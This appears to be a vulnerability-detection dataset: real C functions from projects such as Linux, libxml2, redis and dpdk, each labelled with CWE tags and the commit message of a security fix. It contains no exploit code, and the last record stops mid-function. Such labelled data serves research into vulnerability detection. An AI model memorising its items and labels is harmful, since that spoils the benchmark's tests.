len = _copy_from_iter(req->iu->buf, usr_len, &iter);
WARN_ON(len != usr_len);
reinit_completion(&req->inv_comp);
}
| 0 |
[
"CWE-415"
] |
linux
|
8700af2cc18c919b2a83e74e0479038fd113c15d
| 228,209,813,768,828,250,000,000,000,000,000,000,000 | 33 |
RDMA/rtrs-clt: Fix possible double free in error case
Callback function rtrs_clt_dev_release() for put_device() calls kfree(clt)
to free memory. We shouldn't call kfree(clt) again, and we can't use the
clt after kfree too.
Replace device_register() with device_initialize() and device_add() so that
dev_set_name can() be used appropriately.
Move mutex_destroy() to the release function so it can be called in
the alloc_clt err path.
Fixes: eab098246625 ("RDMA/rtrs-clt: Refactor the failure cases in alloc_clt")
Link: https://lore.kernel.org/r/[email protected]
Reported-by: Miaoqian Lin <[email protected]>
Signed-off-by: Md Haris Iqbal <[email protected]>
Reviewed-by: Jack Wang <[email protected]>
Signed-off-by: Jason Gunthorpe <[email protected]>
|
bool WebSocketProtocol<isServer>::handleFragment(char *data, size_t length, unsigned int remainingBytes, int opCode, bool fin, void *user) {
uS::Socket s((uv_poll_t *) user);
typename WebSocket<isServer>::Data *webSocketData = (typename WebSocket<isServer>::Data *) s.getSocketData();
if (opCode < 3) {
if (!remainingBytes && fin && !webSocketData->fragmentBuffer.length()) {
if (webSocketData->compressionStatus == WebSocket<isServer>::Data::CompressionStatus::COMPRESSED_FRAME) {
webSocketData->compressionStatus = WebSocket<isServer>::Data::CompressionStatus::ENABLED;
Hub *hub = ((Group<isServer> *) s.getSocketData()->nodeData)->hub;
data = hub->inflate(data, length);
if (!data) {
forceClose(user);
return true;
}
}
if (opCode == 1 && !isValidUtf8((unsigned char *) data, length)) {
forceClose(user);
return true;
}
((Group<isServer> *) s.getSocketData()->nodeData)->messageHandler(WebSocket<isServer>(s), data, length, (OpCode) opCode);
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
} else {
webSocketData->fragmentBuffer.append(data, length);
if (!remainingBytes && fin) {
length = webSocketData->fragmentBuffer.length();
if (webSocketData->compressionStatus == WebSocket<isServer>::Data::CompressionStatus::COMPRESSED_FRAME) {
webSocketData->compressionStatus = WebSocket<isServer>::Data::CompressionStatus::ENABLED;
Hub *hub = ((Group<isServer> *) s.getSocketData()->nodeData)->hub;
webSocketData->fragmentBuffer.append("....");
data = hub->inflate((char *) webSocketData->fragmentBuffer.data(), length);
if (!data) {
forceClose(user);
return true;
}
} else {
data = (char *) webSocketData->fragmentBuffer.data();
}
if (opCode == 1 && !isValidUtf8((unsigned char *) data, length)) {
forceClose(user);
return true;
}
((Group<isServer> *) s.getSocketData()->nodeData)->messageHandler(WebSocket<isServer>(s), data, length, (OpCode) opCode);
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
webSocketData->fragmentBuffer.clear();
}
}
} else {
// todo: we don't need to buffer up in most cases!
webSocketData->controlBuffer.append(data, length);
if (!remainingBytes && fin) {
if (opCode == CLOSE) {
CloseFrame closeFrame = parseClosePayload((char *) webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length());
WebSocket<isServer>(s).close(closeFrame.code, closeFrame.message, closeFrame.length);
return true;
} else {
if (opCode == PING) {
WebSocket<isServer>(s).send(webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length(), (OpCode) OpCode::PONG);
((Group<isServer> *) s.getSocketData()->nodeData)->pingHandler(WebSocket<isServer>(s), (char *) webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length());
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
} else if (opCode == PONG) {
((Group<isServer> *) s.getSocketData()->nodeData)->pongHandler(WebSocket<isServer>(s), (char *) webSocketData->controlBuffer.data(), webSocketData->controlBuffer.length());
if (s.isClosed() || s.isShuttingDown()) {
return true;
}
}
}
webSocketData->controlBuffer.clear();
}
}
return false;
}
| 0 |
[
"CWE-20"
] |
uWebSockets
|
37deefd01f0875e133ea967122e3a5e421b8fcd9
| 100,056,682,367,568,210,000,000,000,000,000,000,000 | 82 |
Don't inflate more than ~16mb, drop connection on inflate error
|
void comps_objmrtree_destroy_u(COMPS_Object *obj) {
comps_objmrtree_destroy((COMPS_ObjMRTree*)obj);
}
| 0 |
[
"CWE-416",
"CWE-862"
] |
libcomps
|
e3a5d056633677959ad924a51758876d415e7046
| 36,037,494,143,965,275,000,000,000,000,000,000,000 | 3 |
Fix UAF in comps_objmrtree_unite function
The added field is not used at all in many places and it is probably the
left-over of some copy-paste.
|
void *zmalloc_no_tcache(size_t size) {
ASSERT_NO_SIZE_OVERFLOW(size);
void *ptr = mallocx(size+PREFIX_SIZE, MALLOCX_TCACHE_NONE);
if (!ptr) zmalloc_oom_handler(size);
update_zmalloc_stat_alloc(zmalloc_size(ptr));
return ptr;
}
| 0 |
[
"CWE-190"
] |
redis
|
d32f2e9999ce003bad0bd2c3bca29f64dcce4433
| 275,068,707,131,074,450,000,000,000,000,000,000,000 | 7 |
Fix integer overflow (CVE-2021-21309). (#8522)
On 32-bit systems, setting the proto-max-bulk-len config parameter to a high value may result with integer overflow and a subsequent heap overflow when parsing an input bulk (CVE-2021-21309).
This fix has two parts:
Set a reasonable limit to the config parameter.
Add additional checks to prevent the problem in other potential but unknown code paths.
|
ofputil_append_ipfix_stat(struct ovs_list *replies,
const struct ofputil_ipfix_stats *ois)
{
struct nx_ipfix_stats_reply *reply = ofpmp_append(replies, sizeof *reply);
ofputil_ipfix_stats_to_reply(ois, reply);
}
| 0 |
[
"CWE-772"
] |
ovs
|
77ad4225d125030420d897c873e4734ac708c66b
| 55,978,810,142,258,200,000,000,000,000,000,000,000 | 6 |
ofp-util: Fix memory leaks on error cases in ofputil_decode_group_mod().
Found by libFuzzer.
Reported-by: Bhargava Shastry <[email protected]>
Signed-off-by: Ben Pfaff <[email protected]>
Acked-by: Justin Pettit <[email protected]>
|
xmlDictCreate(void) {
xmlDictPtr dict;
if (!xmlDictInitialized)
if (!__xmlInitializeDict())
return(NULL);
#ifdef DICT_DEBUG_PATTERNS
fprintf(stderr, "C");
#endif
dict = xmlMalloc(sizeof(xmlDict));
if (dict) {
dict->ref_counter = 1;
dict->limit = 0;
dict->size = MIN_DICT_SIZE;
dict->nbElems = 0;
dict->dict = xmlMalloc(MIN_DICT_SIZE * sizeof(xmlDictEntry));
dict->strings = NULL;
dict->subdict = NULL;
if (dict->dict) {
memset(dict->dict, 0, MIN_DICT_SIZE * sizeof(xmlDictEntry));
#ifdef DICT_RANDOMIZATION
dict->seed = __xmlRandom();
#else
dict->seed = 0;
#endif
return(dict);
}
xmlFree(dict);
}
return(NULL);
}
| 0 |
[
"CWE-119"
] |
libxml2
|
6360a31a84efe69d155ed96306b9a931a40beab9
| 199,476,079,647,907,450,000,000,000,000,000,000,000 | 34 |
CVE-2015-7497 Avoid an heap buffer overflow in xmlDictComputeFastQKey
For https://bugzilla.gnome.org/show_bug.cgi?id=756528
It was possible to hit a negative offset in the name indexing
used to randomize the dictionary key generation
Reported and fix provided by David Drysdale @ Google
|
static int __tipc_nl_node_flush_key(struct sk_buff *skb,
struct genl_info *info)
{
struct net *net = sock_net(skb->sk);
struct tipc_net *tn = tipc_net(net);
struct tipc_node *n;
tipc_crypto_key_flush(tn->crypto_tx);
rcu_read_lock();
list_for_each_entry_rcu(n, &tn->node_list, list)
tipc_crypto_key_flush(n->crypto_rx);
rcu_read_unlock();
return 0;
}
| 0 |
[] |
linux
|
0217ed2848e8538bcf9172d97ed2eeb4a26041bb
| 1,070,313,887,725,001,600,000,000,000,000,000,000 | 15 |
tipc: better validate user input in tipc_nl_retrieve_key()
Before calling tipc_aead_key_size(ptr), we need to ensure
we have enough data to dereference ptr->keylen.
We probably also want to make sure tipc_aead_key_size()
wont overflow with malicious ptr->keylen values.
Syzbot reported:
BUG: KMSAN: uninit-value in __tipc_nl_node_set_key net/tipc/node.c:2971 [inline]
BUG: KMSAN: uninit-value in tipc_nl_node_set_key+0x9bf/0x13b0 net/tipc/node.c:3023
CPU: 0 PID: 21060 Comm: syz-executor.5 Not tainted 5.11.0-rc7-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
__dump_stack lib/dump_stack.c:79 [inline]
dump_stack+0x21c/0x280 lib/dump_stack.c:120
kmsan_report+0xfb/0x1e0 mm/kmsan/kmsan_report.c:118
__msan_warning+0x5f/0xa0 mm/kmsan/kmsan_instr.c:197
__tipc_nl_node_set_key net/tipc/node.c:2971 [inline]
tipc_nl_node_set_key+0x9bf/0x13b0 net/tipc/node.c:3023
genl_family_rcv_msg_doit net/netlink/genetlink.c:739 [inline]
genl_family_rcv_msg net/netlink/genetlink.c:783 [inline]
genl_rcv_msg+0x1319/0x1610 net/netlink/genetlink.c:800
netlink_rcv_skb+0x6fa/0x810 net/netlink/af_netlink.c:2494
genl_rcv+0x63/0x80 net/netlink/genetlink.c:811
netlink_unicast_kernel net/netlink/af_netlink.c:1304 [inline]
netlink_unicast+0x11d6/0x14a0 net/netlink/af_netlink.c:1330
netlink_sendmsg+0x1740/0x1840 net/netlink/af_netlink.c:1919
sock_sendmsg_nosec net/socket.c:652 [inline]
sock_sendmsg net/socket.c:672 [inline]
____sys_sendmsg+0xcfc/0x12f0 net/socket.c:2345
___sys_sendmsg net/socket.c:2399 [inline]
__sys_sendmsg+0x714/0x830 net/socket.c:2432
__compat_sys_sendmsg net/compat.c:347 [inline]
__do_compat_sys_sendmsg net/compat.c:354 [inline]
__se_compat_sys_sendmsg+0xa7/0xc0 net/compat.c:351
__ia32_compat_sys_sendmsg+0x4a/0x70 net/compat.c:351
do_syscall_32_irqs_on arch/x86/entry/common.c:79 [inline]
__do_fast_syscall_32+0x102/0x160 arch/x86/entry/common.c:141
do_fast_syscall_32+0x6a/0xc0 arch/x86/entry/common.c:166
do_SYSENTER_32+0x73/0x90 arch/x86/entry/common.c:209
entry_SYSENTER_compat_after_hwframe+0x4d/0x5c
RIP: 0023:0xf7f60549
Code: 03 74 c0 01 10 05 03 74 b8 01 10 06 03 74 b4 01 10 07 03 74 b0 01 10 08 03 74 d8 01 00 00 00 00 00 51 52 55 89 e5 0f 34 cd 80 <5d> 5a 59 c3 90 90 90 90 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00
RSP: 002b:00000000f555a5fc EFLAGS: 00000296 ORIG_RAX: 0000000000000172
RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 0000000020000200
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Uninit was created at:
kmsan_save_stack_with_flags mm/kmsan/kmsan.c:121 [inline]
kmsan_internal_poison_shadow+0x5c/0xf0 mm/kmsan/kmsan.c:104
kmsan_slab_alloc+0x8d/0xe0 mm/kmsan/kmsan_hooks.c:76
slab_alloc_node mm/slub.c:2907 [inline]
__kmalloc_node_track_caller+0xa37/0x1430 mm/slub.c:4527
__kmalloc_reserve net/core/skbuff.c:142 [inline]
__alloc_skb+0x2f8/0xb30 net/core/skbuff.c:210
alloc_skb include/linux/skbuff.h:1099 [inline]
netlink_alloc_large_skb net/netlink/af_netlink.c:1176 [inline]
netlink_sendmsg+0xdbc/0x1840 net/netlink/af_netlink.c:1894
sock_sendmsg_nosec net/socket.c:652 [inline]
sock_sendmsg net/socket.c:672 [inline]
____sys_sendmsg+0xcfc/0x12f0 net/socket.c:2345
___sys_sendmsg net/socket.c:2399 [inline]
__sys_sendmsg+0x714/0x830 net/socket.c:2432
__compat_sys_sendmsg net/compat.c:347 [inline]
__do_compat_sys_sendmsg net/compat.c:354 [inline]
__se_compat_sys_sendmsg+0xa7/0xc0 net/compat.c:351
__ia32_compat_sys_sendmsg+0x4a/0x70 net/compat.c:351
do_syscall_32_irqs_on arch/x86/entry/common.c:79 [inline]
__do_fast_syscall_32+0x102/0x160 arch/x86/entry/common.c:141
do_fast_syscall_32+0x6a/0xc0 arch/x86/entry/common.c:166
do_SYSENTER_32+0x73/0x90 arch/x86/entry/common.c:209
entry_SYSENTER_compat_after_hwframe+0x4d/0x5c
Fixes: e1f32190cf7d ("tipc: add support for AEAD key setting via netlink")
Signed-off-by: Eric Dumazet <[email protected]>
Cc: Tuong Lien <[email protected]>
Cc: Jon Maloy <[email protected]>
Cc: Ying Xue <[email protected]>
Reported-by: syzbot <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
int reset(void)
{
ptr[0]=ptr[1]=ptr[2]=ptr[3]=ptr[4]=ptr[5]=ptr[6]=ptr[7]=0;
return 0;
}
| 0 |
[
"CWE-416",
"CWE-703"
] |
server
|
08c7ab404f69d9c4ca6ca7a9cf7eec74c804f917
| 275,735,299,192,207,800,000,000,000,000,000,000,000 | 5 |
MDEV-24176 Server crashes after insert in the table with virtual
column generated using date_format() and if()
vcol_info->expr is allocated on expr_arena at parsing stage. Since
expr item is allocated on expr_arena all its containee items must be
allocated on expr_arena too. Otherwise fix_session_expr() will
encounter prematurely freed item.
When table is reopened from cache vcol_info contains stale
expression. We refresh expression via TABLE::vcol_fix_exprs() but
first we must prepare a proper context (Vcol_expr_context) which meets
some requirements:
1. As noted above expr update must be done on expr_arena as there may
be new items created. It was a bug in fix_session_expr_for_read() and
was just not reproduced because of no second refix. Now refix is done
for more cases so it does reproduce. Tests affected: vcol.binlog
2. Also name resolution context must be narrowed to the single table.
Tested by: vcol.update main.default vcol.vcol_syntax gcol.gcol_bugfixes
3. sql_mode must be clean and not fail expr update.
sql_mode such as MODE_NO_BACKSLASH_ESCAPES, MODE_NO_ZERO_IN_DATE, etc
must not affect vcol expression update. If the table was created
successfully any further evaluation must not fail. Tests affected:
main.func_like
Reviewed by: Sergei Golubchik <[email protected]>
|
static int ax88179_resume(struct usb_interface *intf)
{
struct usbnet *dev = usb_get_intfdata(intf);
u16 tmp16;
u8 tmp8;
usbnet_link_change(dev, 0, 0);
/* Power up ethernet PHY */
tmp16 = 0;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_PHYPWR_RSTCTL,
2, 2, &tmp16);
udelay(1000);
tmp16 = AX_PHYPWR_RSTCTL_IPRL;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_PHYPWR_RSTCTL,
2, 2, &tmp16);
msleep(200);
/* Ethernet PHY Auto Detach*/
ax88179_auto_detach(dev, 1);
/* Enable clock */
ax88179_read_cmd_nopm(dev, AX_ACCESS_MAC, AX_CLK_SELECT, 1, 1, &tmp8);
tmp8 |= AX_CLK_SELECT_ACS | AX_CLK_SELECT_BCS;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_CLK_SELECT, 1, 1, &tmp8);
msleep(100);
/* Configure RX control register => start operation */
tmp16 = AX_RX_CTL_DROPCRCERR | AX_RX_CTL_IPE | AX_RX_CTL_START |
AX_RX_CTL_AP | AX_RX_CTL_AMALL | AX_RX_CTL_AB;
ax88179_write_cmd_nopm(dev, AX_ACCESS_MAC, AX_RX_CTL, 2, 2, &tmp16);
return usbnet_resume(intf);
}
| 0 |
[
"CWE-787"
] |
linux
|
57bc3d3ae8c14df3ceb4e17d26ddf9eeab304581
| 167,832,701,206,578,830,000,000,000,000,000,000,000 | 35 |
net: usb: ax88179_178a: Fix out-of-bounds accesses in RX fixup
ax88179_rx_fixup() contains several out-of-bounds accesses that can be
triggered by a malicious (or defective) USB device, in particular:
- The metadata array (hdr_off..hdr_off+2*pkt_cnt) can be out of bounds,
causing OOB reads and (on big-endian systems) OOB endianness flips.
- A packet can overlap the metadata array, causing a later OOB
endianness flip to corrupt data used by a cloned SKB that has already
been handed off into the network stack.
- A packet SKB can be constructed whose tail is far beyond its end,
causing out-of-bounds heap data to be considered part of the SKB's
data.
I have tested that this can be used by a malicious USB device to send a
bogus ICMPv6 Echo Request and receive an ICMPv6 Echo Reply in response
that contains random kernel heap data.
It's probably also possible to get OOB writes from this on a
little-endian system somehow - maybe by triggering skb_cow() via IP
options processing -, but I haven't tested that.
Fixes: e2ca90c276e1 ("ax88179_178a: ASIX AX88179_178A USB 3.0/2.0 to gigabit ethernet adapter driver")
Cc: [email protected]
Signed-off-by: Jann Horn <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
static void warn_command_line_option(const char *var, const char *value)
{
warning(_("ignoring '%s' which may be interpreted as"
" a command-line option: %s"), var, value);
}
| 0 |
[
"CWE-88"
] |
git
|
f6adec4e329ef0e25e14c63b735a5956dc67b8bc
| 327,552,819,727,584,450,000,000,000,000,000,000,000 | 5 |
submodule-config: ban submodule urls that start with dash
The previous commit taught the submodule code to invoke our
"git clone $url $path" with a "--" separator so that we
aren't confused by urls or paths that start with dashes.
However, that's just one code path. It's not clear if there
are others, and it would be an easy mistake to add one in
the future. Moreover, even with the fix in the previous
commit, it's quite hard to actually do anything useful with
such an entry. Any url starting with a dash must fall into
one of three categories:
- it's meant as a file url, like "-path". But then any
clone is not going to have the matching path, since it's
by definition relative inside the newly created clone. If
you spell it as "./-path", the submodule code sees the
"/" and translates this to an absolute path, so it at
least works (assuming the receiver has the same
filesystem layout as you). But that trick does not apply
for a bare "-path".
- it's meant as an ssh url, like "-host:path". But this
already doesn't work, as we explicitly disallow ssh
hostnames that begin with a dash (to avoid option
injection against ssh).
- it's a remote-helper scheme, like "-scheme::data". This
_could_ work if the receiver bends over backwards and
creates a funny-named helper like "git-remote--scheme".
But normally there would not be any helper that matches.
Since such a url does not work today and is not likely to do
anything useful in the future, let's simply disallow them
entirely. That protects the existing "git clone" path (in a
belt-and-suspenders way), along with any others that might
exist.
Our tests cover two cases:
1. A file url with "./" continues to work, showing that
there's an escape hatch for people with truly silly
repo names.
2. A url starting with "-" is rejected.
Note that we expect case (2) to fail, but it would have done
so even without this commit, for the reasons given above.
So instead of just expecting failure, let's also check for
the magic word "ignoring" on stderr. That lets us know that
we failed for the right reason.
Signed-off-by: Jeff King <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
|
mrb_vm_define_module(mrb_state *mrb, mrb_value outer, mrb_sym id)
{
check_if_class_or_module(mrb, outer);
if (mrb_const_defined_at(mrb, outer, id)) {
mrb_value old = mrb_const_get(mrb, outer, id);
if (!mrb_module_p(old)) {
mrb_raisef(mrb, E_TYPE_ERROR, "%!v is not a module", old);
}
return mrb_class_ptr(old);
}
return define_module(mrb, id, mrb_class_ptr(outer));
}
| 0 |
[
"CWE-787"
] |
mruby
|
b1d0296a937fe278239bdfac840a3fd0e93b3ee9
| 186,461,784,160,360,100,000,000,000,000,000,000,000 | 13 |
class.c: clear method cache after `remove_method`.
|
spell_free_aff(afffile_T *aff)
{
hashtab_T *ht;
hashitem_T *hi;
int todo;
affheader_T *ah;
affentry_T *ae;
vim_free(aff->af_enc);
/* All this trouble to free the "ae_prog" items... */
for (ht = &aff->af_pref; ; ht = &aff->af_suff)
{
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
vim_regfree(ae->ae_prog);
}
}
if (ht == &aff->af_suff)
break;
}
hash_clear(&aff->af_pref);
hash_clear(&aff->af_suff);
hash_clear(&aff->af_comp);
}
| 0 |
[
"CWE-190"
] |
vim
|
399c297aa93afe2c0a39e2a1b3f972aebba44c9d
| 187,535,697,576,664,120,000,000,000,000,000,000,000 | 32 |
patch 8.0.0322: possible overflow with corrupted spell file
Problem: Possible overflow with spell file where the tree length is
corrupted.
Solution: Check for an invalid length (suggested by shqking)
|
xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
size_t len, size_t size) {
int q, ql;
int r, rl;
int cur, l;
size_t count = 0;
int inputid;
inputid = ctxt->input->id;
if (buf == NULL) {
len = 0;
size = XML_PARSER_BUFFER_SIZE;
buf = (xmlChar *) xmlMallocAtomic(size * sizeof(xmlChar));
if (buf == NULL) {
xmlErrMemory(ctxt, NULL);
return;
}
}
GROW; /* Assure there's enough input data */
q = CUR_CHAR(ql);
if (q == 0)
goto not_terminated;
if (!IS_CHAR(q)) {
xmlFatalErrMsgInt(ctxt, XML_ERR_INVALID_CHAR,
"xmlParseComment: invalid xmlChar value %d\n",
q);
xmlFree (buf);
return;
}
NEXTL(ql);
r = CUR_CHAR(rl);
if (r == 0)
goto not_terminated;
if (!IS_CHAR(r)) {
xmlFatalErrMsgInt(ctxt, XML_ERR_INVALID_CHAR,
"xmlParseComment: invalid xmlChar value %d\n",
q);
xmlFree (buf);
return;
}
NEXTL(rl);
cur = CUR_CHAR(l);
if (cur == 0)
goto not_terminated;
while (IS_CHAR(cur) && /* checked */
((cur != '>') ||
(r != '-') || (q != '-'))) {
if ((r == '-') && (q == '-')) {
xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
}
if ((len > XML_MAX_TEXT_LENGTH) &&
((ctxt->options & XML_PARSE_HUGE) == 0)) {
xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
"Comment too big found", NULL);
xmlFree (buf);
return;
}
if (len + 5 >= size) {
xmlChar *new_buf;
size_t new_size;
new_size = size * 2;
new_buf = (xmlChar *) xmlRealloc(buf, new_size);
if (new_buf == NULL) {
xmlFree (buf);
xmlErrMemory(ctxt, NULL);
return;
}
buf = new_buf;
size = new_size;
}
COPY_BUF(ql,buf,len,q);
q = r;
ql = rl;
r = cur;
rl = l;
count++;
if (count > 50) {
SHRINK;
GROW;
count = 0;
if (ctxt->instate == XML_PARSER_EOF) {
xmlFree(buf);
return;
}
}
NEXTL(l);
cur = CUR_CHAR(l);
if (cur == 0) {
SHRINK;
GROW;
cur = CUR_CHAR(l);
}
}
buf[len] = 0;
if (cur == 0) {
xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
"Comment not terminated \n<!--%.50s\n", buf);
} else if (!IS_CHAR(cur)) {
xmlFatalErrMsgInt(ctxt, XML_ERR_INVALID_CHAR,
"xmlParseComment: invalid xmlChar value %d\n",
cur);
} else {
if (inputid != ctxt->input->id) {
xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_BOUNDARY,
"Comment doesn't start and stop in the same"
" entity\n");
}
NEXT;
if ((ctxt->sax != NULL) && (ctxt->sax->comment != NULL) &&
(!ctxt->disableSAX))
ctxt->sax->comment(ctxt->userData, buf);
}
xmlFree(buf);
return;
not_terminated:
xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
"Comment not terminated\n", NULL);
xmlFree(buf);
return;
}
| 0 |
[
"CWE-776"
] |
libxml2
|
8598060bacada41a0eb09d95c97744ff4e428f8e
| 129,127,758,668,119,930,000,000,000,000,000,000,000 | 123 |
Patch for security issue CVE-2021-3541
This is relapted to parameter entities expansion and following
the line of the billion laugh attack. Somehow in that path the
counting of parameters was missed and the normal algorithm based
on entities "density" was useless.
|
int rte_vhost_host_notifier_ctrl(int vid, uint16_t qid, bool enable)
{
struct virtio_net *dev;
struct rte_vdpa_device *vdpa_dev;
int vfio_device_fd, ret = 0;
uint64_t offset, size;
unsigned int i, q_start, q_last;
dev = get_device(vid);
if (!dev)
return -ENODEV;
vdpa_dev = dev->vdpa_dev;
if (vdpa_dev == NULL)
return -ENODEV;
if (!(dev->features & (1ULL << VIRTIO_F_VERSION_1)) ||
!(dev->features & (1ULL << VHOST_USER_F_PROTOCOL_FEATURES)) ||
!(dev->protocol_features &
(1ULL << VHOST_USER_PROTOCOL_F_SLAVE_REQ)) ||
!(dev->protocol_features &
(1ULL << VHOST_USER_PROTOCOL_F_SLAVE_SEND_FD)) ||
!(dev->protocol_features &
(1ULL << VHOST_USER_PROTOCOL_F_HOST_NOTIFIER)))
return -ENOTSUP;
if (qid == RTE_VHOST_QUEUE_ALL) {
q_start = 0;
q_last = dev->nr_vring - 1;
} else {
if (qid >= dev->nr_vring)
return -EINVAL;
q_start = qid;
q_last = qid;
}
RTE_FUNC_PTR_OR_ERR_RET(vdpa_dev->ops->get_vfio_device_fd, -ENOTSUP);
RTE_FUNC_PTR_OR_ERR_RET(vdpa_dev->ops->get_notify_area, -ENOTSUP);
vfio_device_fd = vdpa_dev->ops->get_vfio_device_fd(vid);
if (vfio_device_fd < 0)
return -ENOTSUP;
if (enable) {
for (i = q_start; i <= q_last; i++) {
if (vdpa_dev->ops->get_notify_area(vid, i, &offset,
&size) < 0) {
ret = -ENOTSUP;
goto disable;
}
if (vhost_user_slave_set_vring_host_notifier(dev, i,
vfio_device_fd, offset, size) < 0) {
ret = -EFAULT;
goto disable;
}
}
} else {
disable:
for (i = q_start; i <= q_last; i++) {
vhost_user_slave_set_vring_host_notifier(dev, i, -1,
0, 0);
}
}
return ret;
}
| 0 |
[
"CWE-125",
"CWE-787"
] |
dpdk
|
6442c329b9d2ded0f44b27d2016aaba8ba5844c5
| 166,447,376,334,192,360,000,000,000,000,000,000,000 | 67 |
vhost: fix queue number check when setting inflight FD
In function vhost_user_set_inflight_fd, queue number in inflight
message is used to access virtqueue. However, queue number could
be larger than VHOST_MAX_VRING and cause write OOB as this number
will be used to write inflight info in virtqueue structure. This
patch checks the queue number to avoid the issue and also make
sure virtqueues are allocated before setting inflight information.
Fixes: ad0a4ae491fe ("vhost: checkout resubmit inflight information")
Cc: [email protected]
Reported-by: Wenxiang Qian <[email protected]>
Signed-off-by: Chenbo Xia <[email protected]>
Reviewed-by: Maxime Coquelin <[email protected]>
|
filter_config (struct backend *b, const char *key, const char *value)
{
struct backend_filter *f = container_of (b, struct backend_filter, backend);
debug ("%s: config key=%s, value=%s",
b->name, key, value);
if (f->filter.config) {
if (f->filter.config (next_config, b->next, key, value) == -1)
exit (EXIT_FAILURE);
}
else
b->next->config (b->next, key, value);
}
| 0 |
[
"CWE-406"
] |
nbdkit
|
a6b88b195a959b17524d1c8353fd425d4891dc5f
| 94,369,123,405,215,490,000,000,000,000,000,000,000 | 14 |
server: Fix regression for NBD_OPT_INFO before NBD_OPT_GO
Most known NBD clients do not bother with NBD_OPT_INFO (except for
clients like 'qemu-nbd --list' that don't ever intend to connect), but
go straight to NBD_OPT_GO. However, it's not too hard to hack up qemu
to add in an extra client step (whether info on the same name, or more
interestingly, info on a different name), as a patch against qemu
commit 6f214b30445:
| diff --git i/nbd/client.c w/nbd/client.c
| index f6733962b49b..425292ac5ea9 100644
| --- i/nbd/client.c
| +++ w/nbd/client.c
| @@ -1038,6 +1038,14 @@ int nbd_receive_negotiate(AioContext *aio_context, QIOChannel *ioc,
| * TLS). If it is not available, fall back to
| * NBD_OPT_LIST for nicer error messages about a missing
| * export, then use NBD_OPT_EXPORT_NAME. */
| + if (getenv ("HACK"))
| + info->name[0]++;
| + result = nbd_opt_info_or_go(ioc, NBD_OPT_INFO, info, errp);
| + if (getenv ("HACK"))
| + info->name[0]--;
| + if (result < 0) {
| + return -EINVAL;
| + }
| result = nbd_opt_info_or_go(ioc, NBD_OPT_GO, info, errp);
| if (result < 0) {
| return -EINVAL;
This works just fine in 1.14.0, where we call .open only once (so the
INFO and GO repeat calls into the same plugin handle), but in 1.14.1
it regressed into causing an assertion failure: we are now calling
.open a second time on a connection that is already opened:
$ nbdkit -rfv null &
$ hacked-qemu-io -f raw -r nbd://localhost -c quit
...
nbdkit: null[1]: debug: null: open readonly=1
nbdkit: backend.c:179: backend_open: Assertion `h->handle == NULL' failed.
Worse, on the mainline development, we have recently made it possible
for plugins to actively report different information for different
export names; for example, a plugin may choose to report different
answers for .can_write on export A than for export B; but if we share
cached handles, then an NBD_OPT_INFO on one export prevents correct
answers for NBD_OPT_GO on the second export name. (The HACK envvar in
my qemu modifications can be used to demonstrate cross-name requests,
which are even less likely in a real client).
The solution is to call .close after NBD_OPT_INFO, coupled with enough
glue logic to reset cached connection handles back to the state
expected by .open. This in turn means factoring out another backend_*
function, but also gives us an opportunity to change
backend_set_handle to no longer accept NULL.
The assertion failure is, to some extent, a possible denial of service
attack (one client can force nbdkit to exit by merely sending OPT_INFO
before OPT_GO, preventing the next client from connecting), although
this is mitigated by using TLS to weed out untrusted clients. Still,
the fact that we introduced a potential DoS attack while trying to fix
a traffic amplification security bug is not very nice.
Sadly, as there are no known clients that easily trigger this mode of
operation (OPT_INFO before OPT_GO), there is no easy way to cover this
via a testsuite addition. I may end up hacking something into libnbd.
Fixes: c05686f957
Signed-off-by: Eric Blake <[email protected]>
|
static int hidinput_get_battery_property(struct power_supply *psy,
enum power_supply_property prop,
union power_supply_propval *val)
{
struct hid_device *dev = power_supply_get_drvdata(psy);
int value;
int ret = 0;
switch (prop) {
case POWER_SUPPLY_PROP_PRESENT:
case POWER_SUPPLY_PROP_ONLINE:
val->intval = 1;
break;
case POWER_SUPPLY_PROP_CAPACITY:
if (dev->battery_status != HID_BATTERY_REPORTED &&
!dev->battery_avoid_query) {
value = hidinput_query_battery_capacity(dev);
if (value < 0)
return value;
} else {
value = dev->battery_capacity;
}
val->intval = value;
break;
case POWER_SUPPLY_PROP_MODEL_NAME:
val->strval = dev->name;
break;
case POWER_SUPPLY_PROP_STATUS:
if (dev->battery_status != HID_BATTERY_REPORTED &&
!dev->battery_avoid_query) {
value = hidinput_query_battery_capacity(dev);
if (value < 0)
return value;
dev->battery_capacity = value;
dev->battery_status = HID_BATTERY_QUERIED;
}
if (dev->battery_status == HID_BATTERY_UNKNOWN)
val->intval = POWER_SUPPLY_STATUS_UNKNOWN;
else if (dev->battery_capacity == 100)
val->intval = POWER_SUPPLY_STATUS_FULL;
else
val->intval = POWER_SUPPLY_STATUS_DISCHARGING;
break;
case POWER_SUPPLY_PROP_SCOPE:
